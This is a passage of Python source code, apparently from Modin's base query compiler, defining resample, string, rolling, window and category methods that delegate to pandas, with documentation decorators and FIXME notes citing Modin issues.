@doc_utils.add_deprecation_warning(replacement_method=\"resample_agg_df\")\n @doc_utils.doc_resample_agg(\n action=\"apply passed aggregation function\",\n params=\"func : str, dict, callable(pandas.Series) -> scalar, or list of such\",\n output=\"function names\",\n refer_to=\"apply\",\n )\n def resample_app_df(self, resample_args, func, *args, **kwargs):\n return ResampleDefault.register(pandas.core.resample.Resampler.apply)(\n self, resample_args, func, *args, **kwargs\n )\n\n @doc_utils.add_deprecation_warning(replacement_method=\"resample_agg_df\")\n @doc_utils.doc_resample_agg(\n action=\"apply passed aggregation function in a one-column query compiler\",\n params=\"func : str, dict, callable(pandas.Series) -> scalar, or list of such\",\n output=\"function names\",\n refer_to=\"apply\",\n )\n def resample_app_ser(self, resample_args, func, *args, **kwargs):\n return ResampleDefault.register(\n pandas.core.resample.Resampler.apply, squeeze_self=True\n )(self, resample_args, func, *args, **kwargs)\n\n def resample_asfreq(self, resample_args, fill_value):\n \"\"\"\n Resample time-series data and get the values at the new frequency.\n\n Group data into intervals by time-series row/column with\n a specified frequency and get values at the new frequency.\n\n Parameters\n ----------\n resample_args : list\n Resample parameters as expected by ``modin.pandas.DataFrame.resample`` signature.\n fill_value : 
scalar\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler containing values at the specified frequency.\n \"\"\"\n return ResampleDefault.register(pandas.core.resample.Resampler.asfreq)(\n self, resample_args, fill_value\n )\n\n # FIXME: `resample_backfill` is an alias for `resample_bfill`, one of these methods\n # should be removed (Modin issue #3107).\n @doc_utils.doc_resample_fillna(method=\"back-fill\", refer_to=\"backfill\")\n def resample_backfill(self, resample_args, limit):\n return ResampleDefault.register(pandas.core.resample.Resampler.backfill)(\n self, resample_args, limit\n )\n\n @doc_utils.doc_resample_fillna(method=\"back-fill\", refer_to=\"bfill\")\n def resample_bfill(self, resample_args, limit):\n return ResampleDefault.register(pandas.core.resample.Resampler.bfill)(\n self, resample_args, limit\n )\n\n @doc_utils.doc_resample_reduction(\n result=\"number of non-NA values\", refer_to=\"count\", compatibility_params=False\n )\n def resample_count(self, resample_args):\n return ResampleDefault.register(pandas.core.resample.Resampler.count)(\n self, resample_args\n )\n\n # FIXME: `resample_ffill` is an alias for `resample_pad`, one of these methods\n # should be removed (Modin issue #3107).\n @doc_utils.doc_resample_fillna(method=\"forward-fill\", refer_to=\"ffill\")\n def resample_ffill(self, resample_args, limit):\n return ResampleDefault.register(pandas.core.resample.Resampler.ffill)(\n self, resample_args, limit\n )\n\n # FIXME: we should combine all resample fillna methods into `resample_fillna`\n # (Modin issue #3107)\n @doc_utils.doc_resample_fillna(\n method=\"specified\", refer_to=\"fillna\", params=\"method : str\"\n )\n def resample_fillna(self, resample_args, method, limit):\n return ResampleDefault.register(pandas.core.resample.Resampler.fillna)(\n self, resample_args, method, limit\n )\n\n @doc_utils.doc_resample_reduction(\n result=\"first element\", refer_to=\"first\", params=\"_method : str\"\n )\n def resample_first(self, resample_args, _method, *args, **kwargs):\n return ResampleDefault.register(pandas.core.resample.Resampler.first)(\n self, resample_args, _method, *args, **kwargs\n )\n\n # FIXME: This function takes a Modin DataFrame via the `obj` parameter,\n # we should avoid leaking high-level objects to the query compiler level.\n # (Modin issue #3106)\n def resample_get_group(self, resample_args, name, obj):\n \"\"\"\n Resample time-series data and get the specified group.\n\n Group data into intervals by time-series row/column with\n a specified frequency and get the values of the specified group.\n\n Parameters\n ----------\n resample_args : list\n Resample parameters as expected by ``modin.pandas.DataFrame.resample`` signature.\n name : object\n obj : modin.pandas.DataFrame, optional\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler containing the values from the specified group.\n \"\"\"\n return ResampleDefault.register(pandas.core.resample.Resampler.get_group)(\n self, resample_args, name, obj\n )\n\n @doc_utils.doc_resample_fillna(\n method=\"specified interpolation\",\n refer_to=\"interpolate\",\n params=\"\"\"\n method : str\n axis : {0, 1}\n limit : int\n inplace : {False}\n This parameter serves the compatibility purpose. 
Always has to be False.\n limit_direction : {\"forward\", \"backward\", \"both\"}\n limit_area : {None, \"inside\", \"outside\"}\n downcast : str, optional\n **kwargs : dict\n \"\"\",\n overwrite_template_params=True,\n )\n def resample_interpolate(\n self,\n resample_args,\n method,\n axis,\n limit,\n inplace,\n limit_direction,\n limit_area,\n downcast,\n **kwargs,\n ):\n return ResampleDefault.register(pandas.core.resample.Resampler.interpolate)(\n self,\n resample_args,\n method,\n axis,\n limit,\n inplace,\n limit_direction,\n limit_area,\n downcast,\n **kwargs,\n )\n\n @doc_utils.doc_resample_reduction(\n result=\"last element\", params=\"_method : str\", refer_to=\"last\"\n )\n def resample_last(self, resample_args, _method, *args, **kwargs):\n return ResampleDefault.register(pandas.core.resample.Resampler.last)(\n self, resample_args, _method, *args, **kwargs\n )\n\n @doc_utils.doc_resample_reduction(\n result=\"maximum value\", params=\"_method : str\", refer_to=\"max\"\n )\n def resample_max(self, resample_args, _method, *args, **kwargs):\n return ResampleDefault.register(pandas.core.resample.Resampler.max)(\n self, resample_args, _method, *args, **kwargs\n )\n\n @doc_utils.doc_resample_reduction(\n result=\"mean value\", params=\"_method : str\", refer_to=\"mean\"\n )\n def resample_mean(self, resample_args, _method, *args, **kwargs):\n return ResampleDefault.register(pandas.core.resample.Resampler.mean)(\n self, resample_args, _method, *args, **kwargs\n )\n\n @doc_utils.doc_resample_reduction(\n result=\"median value\", params=\"_method : str\", refer_to=\"median\"\n )\n def resample_median(self, resample_args, _method, *args, **kwargs):\n return ResampleDefault.register(pandas.core.resample.Resampler.median)(\n self, resample_args, _method, *args, **kwargs\n )\n\n @doc_utils.doc_resample_reduction(\n result=\"minimum value\", params=\"_method : str\", refer_to=\"min\"\n )\n def resample_min(self, resample_args, _method, *args, **kwargs):\n return ResampleDefault.register(pandas.core.resample.Resampler.min)(\n self, resample_args, _method, *args, **kwargs\n )\n\n @doc_utils.doc_resample_fillna(method=\"'nearest'\", refer_to=\"nearest\")\n def resample_nearest(self, resample_args, limit):\n return ResampleDefault.register(pandas.core.resample.Resampler.nearest)(\n self, resample_args, limit\n )\n\n @doc_utils.doc_resample_reduction(\n result=\"number of unique values\", params=\"_method : str\", refer_to=\"nunique\"\n )\n def resample_nunique(self, resample_args, _method, *args, **kwargs):\n return ResampleDefault.register(pandas.core.resample.Resampler.nunique)(\n self, resample_args, _method, *args, **kwargs\n )\n\n # FIXME: Backend shouldn't care about differences between Series and DataFrame\n # so `resample_ohlc_df` and `resample_ohlc_ser` should be combined (Modin issue #3104).\n @doc_utils.doc_resample_agg(\n action=\"compute open, high, low and close values\",\n params=\"_method : str\",\n output=\"labels of columns containing computed values\",\n refer_to=\"ohlc\",\n )\n def resample_ohlc_df(self, resample_args, _method, *args, **kwargs):\n return ResampleDefault.register(pandas.core.resample.Resampler.ohlc)(\n self, resample_args, _method, *args, **kwargs\n )\n\n @doc_utils.doc_resample_agg(\n action=\"compute open, high, low and close values\",\n params=\"_method : str\",\n output=\"labels of columns containing computed values\",\n refer_to=\"ohlc\",\n )\n def resample_ohlc_ser(self, resample_args, _method, *args, **kwargs):\n return ResampleDefault.register(\n 
pandas.core.resample.Resampler.ohlc, squeeze_self=True\n )(self, resample_args, _method, *args, **kwargs)\n\n @doc_utils.doc_resample_fillna(method=\"'pad'\", refer_to=\"pad\")\n def resample_pad(self, resample_args, limit):\n return ResampleDefault.register(pandas.core.resample.Resampler.pad)(\n self, resample_args, limit\n )\n\n # FIXME: This method requires us to build a high-level resampler object,\n # which we shouldn't do at the backend. We need to move this to the frontend.\n # (Modin issue #3105)\n @doc_utils.add_refer_to(\"Resampler.pipe\")\n def resample_pipe(self, resample_args, func, *args, **kwargs):\n \"\"\"\n Resample time-series data and apply aggregation on it.\n\n Group data into intervals by time-series row/column with\n a specified frequency, build equivalent ``pandas.Resampler`` object\n and apply passed function to it.\n\n Parameters\n ----------\n resample_args : list\n Resample parameters as expected by ``modin.pandas.DataFrame.resample`` signature.\n func : callable(pandas.Resampler) -> object or tuple(callable, str)\n *args : iterable\n Positional arguments to pass to function.\n **kwargs : dict\n Keyword arguments to pass to function.\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler containing the result of passed function.\n \"\"\"\n return ResampleDefault.register(pandas.core.resample.Resampler.pipe)(\n self, resample_args, func, *args, **kwargs\n )\n\n @doc_utils.doc_resample_reduction(\n result=\"product\",\n params=\"\"\"\n _method : str\n min_count : int\"\"\",\n refer_to=\"prod\",\n )\n def resample_prod(self, resample_args, _method, min_count, *args, **kwargs):\n return ResampleDefault.register(pandas.core.resample.Resampler.prod)(\n self, resample_args, _method, min_count, *args, **kwargs\n )\n\n @doc_utils.doc_resample_reduction(\n result=\"quantile\", params=\"q : float\", refer_to=\"quantile\"\n )\n def resample_quantile(self, resample_args, q, *args, **kwargs):\n return ResampleDefault.register(pandas.core.resample.Resampler.quantile)(\n self, resample_args, q, *args, **kwargs\n )\n\n @doc_utils.doc_resample_reduction(\n result=\"standard error of the mean\",\n params=\"ddof : int, default: 1\",\n refer_to=\"sem\",\n )\n def resample_sem(self, resample_args, ddof=1, *args, **kwargs):\n return ResampleDefault.register(pandas.core.resample.Resampler.sem)(\n self, resample_args, ddof, *args, **kwargs\n )\n\n @doc_utils.doc_resample_reduction(\n result=\"number of elements in a group\", refer_to=\"size\"\n )\n def resample_size(self, resample_args, *args, **kwargs):\n return ResampleDefault.register(pandas.core.resample.Resampler.size)(\n self, resample_args, *args, **kwargs\n )\n\n @doc_utils.doc_resample_reduction(\n result=\"standard deviation\", params=\"ddof : int\", refer_to=\"std\"\n )\n def resample_std(self, resample_args, ddof, *args, **kwargs):\n return ResampleDefault.register(pandas.core.resample.Resampler.std)(\n self, resample_args, ddof, *args, **kwargs\n )\n\n @doc_utils.doc_resample_reduction(\n result=\"sum\",\n params=\"\"\"\n _method : str\n min_count : int\"\"\",\n refer_to=\"sum\",\n )\n def resample_sum(self, resample_args, _method, min_count, *args, **kwargs):\n return ResampleDefault.register(pandas.core.resample.Resampler.sum)(\n self, resample_args, _method, min_count, *args, **kwargs\n )\n\n def resample_transform(self, resample_args, arg, *args, **kwargs):\n \"\"\"\n Resample time-series data and apply aggregation on it.\n\n Group data into intervals by time-series row/column with\n a specified frequency and call 
passed function on each group.\n In contrast to ``resample_app_df`` apply function to the whole group,\n instead of a single axis.\n\n Parameters\n ----------\n resample_args : list\n Resample parameters as expected by ``modin.pandas.DataFrame.resample`` signature.\n arg : callable(pandas.DataFrame) -> pandas.Series\n *args : iterable\n Positional arguments to pass to function.\n **kwargs : dict\n Keyword arguments to pass to function.\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler containing the result of passed function.\n \"\"\"\n return ResampleDefault.register(pandas.core.resample.Resampler.transform)(\n self, resample_args, arg, *args, **kwargs\n )\n\n @doc_utils.doc_resample_reduction(\n result=\"variance\", params=\"ddof : int\", refer_to=\"var\"\n )\n def resample_var(self, resample_args, ddof, *args, **kwargs):\n return ResampleDefault.register(pandas.core.resample.Resampler.var)(\n self, resample_args, ddof, *args, **kwargs\n )\n\n # End of Resample methods\n\n # Str methods\n\n @doc_utils.doc_str_method(refer_to=\"capitalize\", params=\"\")\n def str_capitalize(self):\n return StrDefault.register(pandas.Series.str.capitalize)(self)\n\n @doc_utils.doc_str_method(\n refer_to=\"center\",\n params=\"\"\"\n width : int\n fillchar : str, default: ' '\"\"\",\n )\n def str_center(self, width, fillchar=\" \"):\n return StrDefault.register(pandas.Series.str.center)(self, width, fillchar)\n\n @doc_utils.doc_str_method(\n refer_to=\"contains\",\n params=\"\"\"\n pat : str\n case : bool, default: True\n flags : int, default: 0\n na : object, default: np.NaN\n regex : bool, default: True\"\"\",\n )\n def str_contains(self, pat, case=True, flags=0, na=np.NaN, regex=True):\n return StrDefault.register(pandas.Series.str.contains)(\n self, pat, case, flags, na, regex\n )\n\n @doc_utils.doc_str_method(\n refer_to=\"count\",\n params=\"\"\"\n pat : str\n flags : int, default: 0\n **kwargs : dict\"\"\",\n )\n def str_count(self, pat, flags=0, **kwargs):\n return StrDefault.register(pandas.Series.str.count)(self, pat, flags, **kwargs)\n\n @doc_utils.doc_str_method(\n refer_to=\"endswith\",\n params=\"\"\"\n pat : str\n na : object, default: np.NaN\"\"\",\n )\n def str_endswith(self, pat, na=np.NaN):\n return StrDefault.register(pandas.Series.str.endswith)(self, pat, na)\n\n @doc_utils.doc_str_method(\n refer_to=\"find\",\n params=\"\"\"\n sub : str\n start : int, default: 0\n end : int, optional\"\"\",\n )\n def str_find(self, sub, start=0, end=None):\n return StrDefault.register(pandas.Series.str.find)(self, sub, start, end)\n\n @doc_utils.doc_str_method(\n refer_to=\"findall\",\n params=\"\"\"\n pat : str\n flags : int, default: 0\n **kwargs : dict\"\"\",\n )\n def str_findall(self, pat, flags=0, **kwargs):\n return StrDefault.register(pandas.Series.str.findall)(\n self, pat, flags, **kwargs\n )\n\n @doc_utils.doc_str_method(refer_to=\"get\", params=\"i : int\")\n def str_get(self, i):\n return StrDefault.register(pandas.Series.str.get)(self, i)\n\n @doc_utils.doc_str_method(\n refer_to=\"index\",\n params=\"\"\"\n sub : str\n start : int, default: 0\n end : int, optional\"\"\",\n )\n def str_index(self, sub, start=0, end=None):\n return StrDefault.register(pandas.Series.str.index)(self, sub, start, end)\n\n @doc_utils.doc_str_method(refer_to=\"isalnum\", params=\"\")\n def str_isalnum(self):\n return StrDefault.register(pandas.Series.str.isalnum)(self)\n\n @doc_utils.doc_str_method(refer_to=\"isalpha\", params=\"\")\n def str_isalpha(self):\n return 
StrDefault.register(pandas.Series.str.isalpha)(self)\n\n @doc_utils.doc_str_method(refer_to=\"isdecimal\", params=\"\")\n def str_isdecimal(self):\n return StrDefault.register(pandas.Series.str.isdecimal)(self)\n\n @doc_utils.doc_str_method(refer_to=\"isdigit\", params=\"\")\n def str_isdigit(self):\n return StrDefault.register(pandas.Series.str.isdigit)(self)\n\n @doc_utils.doc_str_method(refer_to=\"islower\", params=\"\")\n def str_islower(self):\n return StrDefault.register(pandas.Series.str.islower)(self)\n\n @doc_utils.doc_str_method(refer_to=\"isnumeric\", params=\"\")\n def str_isnumeric(self):\n return StrDefault.register(pandas.Series.str.isnumeric)(self)\n\n @doc_utils.doc_str_method(refer_to=\"isspace\", params=\"\")\n def str_isspace(self):\n return StrDefault.register(pandas.Series.str.isspace)(self)\n\n @doc_utils.doc_str_method(refer_to=\"istitle\", params=\"\")\n def str_istitle(self):\n return StrDefault.register(pandas.Series.str.istitle)(self)\n\n @doc_utils.doc_str_method(refer_to=\"isupper\", params=\"\")\n def str_isupper(self):\n return StrDefault.register(pandas.Series.str.isupper)(self)\n\n @doc_utils.doc_str_method(refer_to=\"join\", params=\"sep : str\")\n def str_join(self, sep):\n return StrDefault.register(pandas.Series.str.join)(self, sep)\n\n @doc_utils.doc_str_method(refer_to=\"len\", params=\"\")\n def str_len(self):\n return StrDefault.register(pandas.Series.str.len)(self)\n\n @doc_utils.doc_str_method(\n refer_to=\"ljust\",\n params=\"\"\"\n width : int\n fillchar : str, default: ' '\"\"\",\n )\n def str_ljust(self, width, fillchar=\" \"):\n return StrDefault.register(pandas.Series.str.ljust)(self, width, fillchar)\n\n @doc_utils.doc_str_method(refer_to=\"lower\", params=\"\")\n def str_lower(self):\n return StrDefault.register(pandas.Series.str.lower)(self)\n\n @doc_utils.doc_str_method(refer_to=\"lstrip\", params=\"to_strip : str, optional\")\n def str_lstrip(self, to_strip=None):\n return StrDefault.register(pandas.Series.str.lstrip)(self, to_strip)\n\n @doc_utils.doc_str_method(\n refer_to=\"match\",\n params=\"\"\"\n pat : str\n case : bool, default: True\n flags : int, default: 0\n na : object, default: np.NaN\"\"\",\n )\n def str_match(self, pat, case=True, flags=0, na=np.NaN):\n return StrDefault.register(pandas.Series.str.match)(self, pat, case, flags, na)\n\n @doc_utils.doc_str_method(\n refer_to=\"normalize\", params=\"form : {'NFC', 'NFKC', 'NFD', 'NFKD'}\"\n )\n def str_normalize(self, form):\n return StrDefault.register(pandas.Series.str.normalize)(self, form)\n\n @doc_utils.doc_str_method(\n refer_to=\"pad\",\n params=\"\"\"\n width : int\n side : {'left', 'right', 'both'}, default: 'left'\n fillchar : str, default: ' '\"\"\",\n )\n def str_pad(self, width, side=\"left\", fillchar=\" \"):\n return StrDefault.register(pandas.Series.str.pad)(self, width, side, fillchar)\n\n @doc_utils.doc_str_method(\n refer_to=\"partition\",\n params=\"\"\"\n sep : str, default: ' '\n expand : bool, default: True\"\"\",\n )\n def str_partition(self, sep=\" \", expand=True):\n return StrDefault.register(pandas.Series.str.partition)(self, sep, expand)\n\n @doc_utils.doc_str_method(refer_to=\"repeat\", params=\"repeats : int\")\n def str_repeat(self, repeats):\n return StrDefault.register(pandas.Series.str.repeat)(self, repeats)\n\n @doc_utils.doc_str_method(\n refer_to=\"replace\",\n params=\"\"\"\n pat : str\n repl : str or callable\n n : int, default: -1\n case : bool, optional\n flags : int, default: 0\n regex : bool, default: True\"\"\",\n )\n def 
str_replace(self, pat, repl, n=-1, case=None, flags=0, regex=True):\n return StrDefault.register(pandas.Series.str.replace)(\n self, pat, repl, n, case, flags, regex\n )\n\n @doc_utils.doc_str_method(\n refer_to=\"rfind\",\n params=\"\"\"\n sub : str\n start : int, default: 0\n end : int, optional\"\"\",\n )\n def str_rfind(self, sub, start=0, end=None):\n return StrDefault.register(pandas.Series.str.rfind)(self, sub, start, end)\n\n @doc_utils.doc_str_method(\n refer_to=\"rindex\",\n params=\"\"\"\n sub : str\n start : int, default: 0\n end : int, optional\"\"\",\n )\n def str_rindex(self, sub, start=0, end=None):\n return StrDefault.register(pandas.Series.str.rindex)(self, sub, start, end)\n\n @doc_utils.doc_str_method(\n refer_to=\"rjust\",\n params=\"\"\"\n width : int\n fillchar : str, default: ' '\"\"\",\n )\n def str_rjust(self, width, fillchar=\" \"):\n return StrDefault.register(pandas.Series.str.rjust)(self, width, fillchar)\n\n @doc_utils.doc_str_method(\n refer_to=\"rpartition\",\n params=\"\"\"\n sep : str, default: ' '\n expand : bool, default: True\"\"\",\n )\n def str_rpartition(self, sep=\" \", expand=True):\n return StrDefault.register(pandas.Series.str.rpartition)(self, sep, expand)\n\n @doc_utils.doc_str_method(\n refer_to=\"rsplit\",\n params=\"\"\"\n pat : str, optional\n n : int, default: -1\n expand : bool, default: False\"\"\",\n )\n def str_rsplit(self, pat=None, n=-1, expand=False):\n return StrDefault.register(pandas.Series.str.rsplit)(self, pat, n, expand)\n\n @doc_utils.doc_str_method(refer_to=\"rstrip\", params=\"to_strip : str, optional\")\n def str_rstrip(self, to_strip=None):\n return StrDefault.register(pandas.Series.str.rstrip)(self, to_strip)\n\n @doc_utils.doc_str_method(\n refer_to=\"slice\",\n params=\"\"\"\n start : int, optional\n stop : int, optional\n step : int, optional\"\"\",\n )\n def str_slice(self, start=None, stop=None, step=None):\n return StrDefault.register(pandas.Series.str.slice)(self, start, stop, step)\n\n @doc_utils.doc_str_method(\n refer_to=\"slice_replace\",\n params=\"\"\"\n start : int, optional\n stop : int, optional\n repl : str or callable, optional\"\"\",\n )\n def str_slice_replace(self, start=None, stop=None, repl=None):\n return StrDefault.register(pandas.Series.str.slice_replace)(\n self, start, stop, repl\n )\n\n @doc_utils.doc_str_method(\n refer_to=\"split\",\n params=\"\"\"\n pat : str, optional\n n : int, default: -1\n expand : bool, default: False\"\"\",\n )\n def str_split(self, pat=None, n=-1, expand=False):\n return StrDefault.register(pandas.Series.str.split)(self, pat, n, expand)\n\n @doc_utils.doc_str_method(\n refer_to=\"startswith\",\n params=\"\"\"\n pat : str\n na : object, default: np.NaN\"\"\",\n )\n def str_startswith(self, pat, na=np.NaN):\n return StrDefault.register(pandas.Series.str.startswith)(self, pat, na)\n\n @doc_utils.doc_str_method(refer_to=\"strip\", params=\"to_strip : str, optional\")\n def str_strip(self, to_strip=None):\n return StrDefault.register(pandas.Series.str.strip)(self, to_strip)\n\n @doc_utils.doc_str_method(refer_to=\"swapcase\", params=\"\")\n def str_swapcase(self):\n return StrDefault.register(pandas.Series.str.swapcase)(self)\n\n @doc_utils.doc_str_method(refer_to=\"title\", params=\"\")\n def str_title(self):\n return StrDefault.register(pandas.Series.str.title)(self)\n\n @doc_utils.doc_str_method(refer_to=\"translate\", params=\"table : dict\")\n def str_translate(self, table):\n return StrDefault.register(pandas.Series.str.translate)(self, table)\n\n 
@doc_utils.doc_str_method(refer_to=\"upper\", params=\"\")\n def str_upper(self):\n return StrDefault.register(pandas.Series.str.upper)(self)\n\n @doc_utils.doc_str_method(\n refer_to=\"wrap\",\n params=\"\"\"\n width : int\n **kwargs : dict\"\"\",\n )\n def str_wrap(self, width, **kwargs):\n return StrDefault.register(pandas.Series.str.wrap)(self, width, **kwargs)\n\n @doc_utils.doc_str_method(refer_to=\"zfill\", params=\"width : int\")\n def str_zfill(self, width):\n return StrDefault.register(pandas.Series.str.zfill)(self, width)\n\n # End of Str methods\n\n # Rolling methods\n\n # FIXME: most of the rolling/window methods take *args and **kwargs parameters\n # which are only needed for compatibility with numpy; this behaviour is inherited\n # from the API level, and we should get rid of it (Modin issue #3108).\n\n @doc_utils.doc_window_method(\n result=\"the result of passed functions\",\n action=\"apply specified functions\",\n refer_to=\"aggregate\",\n params=\"\"\"\n func : str, dict, callable(pandas.Series) -> scalar, or list of such\n *args : iterable\n **kwargs : dict\"\"\",\n build_rules=\"udf_aggregation\",\n )\n def rolling_aggregate(self, rolling_args, func, *args, **kwargs):\n return RollingDefault.register(pandas.core.window.rolling.Rolling.aggregate)(\n self, rolling_args, func, *args, **kwargs\n )\n\n # FIXME: at the query compiler level, `rolling_apply` is an alias for `rolling_aggregate`,\n # one of these should be removed (Modin issue #3107).\n @doc_utils.add_deprecation_warning(replacement_method=\"rolling_aggregate\")\n @doc_utils.doc_window_method(\n result=\"the result of passed function\",\n action=\"apply specified function\",\n refer_to=\"apply\",\n params=\"\"\"\n func : callable(pandas.Series) -> scalar\n raw : bool, default: False\n engine : None, default: None\n This parameter serves the compatibility purpose. Always has to be None.\n engine_kwargs : None, default: None\n This parameter serves the compatibility purpose. 
Always has to be None.\n args : tuple, optional\n kwargs : dict, optional\"\"\",\n build_rules=\"udf_aggregation\",\n )\n def rolling_apply(\n self,\n rolling_args,\n func,\n raw=False,\n engine=None,\n engine_kwargs=None,\n args=None,\n kwargs=None,\n ):\n return RollingDefault.register(pandas.core.window.rolling.Rolling.apply)(\n self, rolling_args, func, raw, engine, engine_kwargs, args, kwargs\n )\n\n @doc_utils.doc_window_method(\n result=\"correlation\",\n refer_to=\"corr\",\n params=\"\"\"\n other : modin.pandas.Series, modin.pandas.DataFrame, list-like, optional\n pairwise : bool, optional\n *args : iterable\n **kwargs : dict\"\"\",\n )\n def rolling_corr(self, rolling_args, other=None, pairwise=None, *args, **kwargs):\n return RollingDefault.register(pandas.core.window.rolling.Rolling.corr)(\n self, rolling_args, other, pairwise, *args, **kwargs\n )\n\n @doc_utils.doc_window_method(result=\"number of non-NA values\", refer_to=\"count\")\n def rolling_count(self, rolling_args):\n return RollingDefault.register(pandas.core.window.rolling.Rolling.count)(\n self, rolling_args\n )\n\n @doc_utils.doc_window_method(\n result=\"covariance\",\n refer_to=\"cov\",\n params=\"\"\"\n other : modin.pandas.Series, modin.pandas.DataFrame, list-like, optional\n pairwise : bool, optional\n ddof : int, default: 1\n **kwargs : dict\"\"\",\n )\n def rolling_cov(self, rolling_args, other=None, pairwise=None, ddof=1, **kwargs):\n return RollingDefault.register(pandas.core.window.rolling.Rolling.cov)(\n self, rolling_args, other, pairwise, ddof, **kwargs\n )\n\n @doc_utils.doc_window_method(\n result=\"unbiased kurtosis\", refer_to=\"kurt\", params=\"**kwargs : dict\"\n )\n def rolling_kurt(self, rolling_args, **kwargs):\n return RollingDefault.register(pandas.core.window.rolling.Rolling.kurt)(\n self, rolling_args, **kwargs\n )\n\n @doc_utils.doc_window_method(\n result=\"maximum value\",\n refer_to=\"max\",\n params=\"\"\"\n *args : iterable\n **kwargs : dict\"\"\",\n )\n def rolling_max(self, rolling_args, *args, **kwargs):\n return RollingDefault.register(pandas.core.window.rolling.Rolling.max)(\n self, rolling_args, *args, **kwargs\n )\n\n @doc_utils.doc_window_method(\n result=\"mean value\",\n refer_to=\"mean\",\n params=\"\"\"\n *args : iterable\n **kwargs : dict\"\"\",\n )\n def rolling_mean(self, rolling_args, *args, **kwargs):\n return RollingDefault.register(pandas.core.window.rolling.Rolling.mean)(\n self, rolling_args, *args, **kwargs\n )\n\n @doc_utils.doc_window_method(\n result=\"median value\", refer_to=\"median\", params=\"**kwargs : dict\"\n )\n def rolling_median(self, rolling_args, **kwargs):\n return RollingDefault.register(pandas.core.window.rolling.Rolling.median)(\n self, rolling_args, **kwargs\n )\n\n @doc_utils.doc_window_method(\n result=\"minimum value\",\n refer_to=\"min\",\n params=\"\"\"\n *args : iterable\n **kwargs : dict\"\"\",\n )\n def rolling_min(self, rolling_args, *args, **kwargs):\n return RollingDefault.register(pandas.core.window.rolling.Rolling.min)(\n self, rolling_args, *args, **kwargs\n )\n\n @doc_utils.doc_window_method(\n result=\"quantile\",\n refer_to=\"quantile\",\n params=\"\"\"\n quantile : float\n interpolation : {'linear', 'lower', 'higher', 'midpoint', 'nearest'}, default: 'linear'\n **kwargs : dict\"\"\",\n )\n def rolling_quantile(\n self, rolling_args, quantile, interpolation=\"linear\", **kwargs\n ):\n return RollingDefault.register(pandas.core.window.rolling.Rolling.quantile)(\n self, rolling_args, quantile, interpolation, **kwargs\n )\n\n 
@doc_utils.doc_window_method(\n result=\"unbiased skewness\", refer_to=\"skew\", params=\"**kwargs : dict\"\n )\n def rolling_skew(self, rolling_args, **kwargs):\n return RollingDefault.register(pandas.core.window.rolling.Rolling.skew)(\n self, rolling_args, **kwargs\n )\n\n @doc_utils.doc_window_method(\n result=\"standard deviation\",\n refer_to=\"std\",\n params=\"\"\"\n ddof : int, default: 1\n *args : iterable\n **kwargs : dict\"\"\",\n )\n def rolling_std(self, rolling_args, ddof=1, *args, **kwargs):\n return RollingDefault.register(pandas.core.window.rolling.Rolling.std)(\n self, rolling_args, ddof, *args, **kwargs\n )\n\n @doc_utils.doc_window_method(\n result=\"sum\",\n refer_to=\"sum\",\n params=\"\"\"\n *args : iterable\n **kwargs : dict\"\"\",\n )\n def rolling_sum(self, rolling_args, *args, **kwargs):\n return RollingDefault.register(pandas.core.window.rolling.Rolling.sum)(\n self, rolling_args, *args, **kwargs\n )\n\n @doc_utils.doc_window_method(\n result=\"variance\",\n refer_to=\"var\",\n params=\"\"\"\n ddof : int, default: 1\n *args : iterable\n **kwargs : dict\"\"\",\n )\n def rolling_var(self, rolling_args, ddof=1, *args, **kwargs):\n return RollingDefault.register(pandas.core.window.rolling.Rolling.var)(\n self, rolling_args, ddof, *args, **kwargs\n )\n\n # End of Rolling methods\n\n # Window methods\n\n @doc_utils.doc_window_method(\n win_type=\"window of the specified type\",\n result=\"mean\",\n refer_to=\"mean\",\n params=\"\"\"\n *args : iterable\n **kwargs : dict\"\"\",\n )\n def window_mean(self, window_args, *args, **kwargs):\n return RollingDefault.register(pandas.core.window.Window.mean)(\n self, window_args, *args, **kwargs\n )\n\n @doc_utils.doc_window_method(\n win_type=\"window of the specified type\",\n result=\"standard deviation\",\n refer_to=\"std\",\n params=\"\"\"\n ddof : int, default: 1\n *args : iterable\n **kwargs : dict\"\"\",\n )\n def window_std(self, window_args, ddof=1, *args, **kwargs):\n return RollingDefault.register(pandas.core.window.Window.std)(\n self, window_args, ddof, *args, **kwargs\n )\n\n @doc_utils.doc_window_method(\n win_type=\"window of the specified type\",\n result=\"sum\",\n refer_to=\"sum\",\n params=\"\"\"\n *args : iterable\n **kwargs : dict\"\"\",\n )\n def window_sum(self, window_args, *args, **kwargs):\n return RollingDefault.register(pandas.core.window.Window.sum)(\n self, window_args, *args, **kwargs\n )\n\n @doc_utils.doc_window_method(\n win_type=\"window of the specified type\",\n result=\"variance\",\n refer_to=\"var\",\n params=\"\"\"\n ddof : int, default: 1\n *args : iterable\n **kwargs : dict\"\"\",\n )\n def window_var(self, window_args, ddof=1, *args, **kwargs):\n return RollingDefault.register(pandas.core.window.Window.var)(\n self, window_args, ddof, *args, **kwargs\n )\n\n # End of Window methods\n\n # Categories methods\n\n @doc_utils.add_one_column_warning\n @doc_utils.add_refer_to(\"Series.cat.codes\")\n def cat_codes(self):\n \"\"\"\n Convert underlying categories data into its codes.\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler containing the integer codes of the underlying\n categories.\n \"\"\"\n return CatDefault.register(pandas.Series.cat.codes)(self)\n\n # End of Categories methods\n\n # DataFrame methods\n\n def invert(self):\n \"\"\"\n Apply bitwise inversion for each element of the QueryCompiler.\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler containing bitwise inversion for each value.\n \"\"\"\n return 
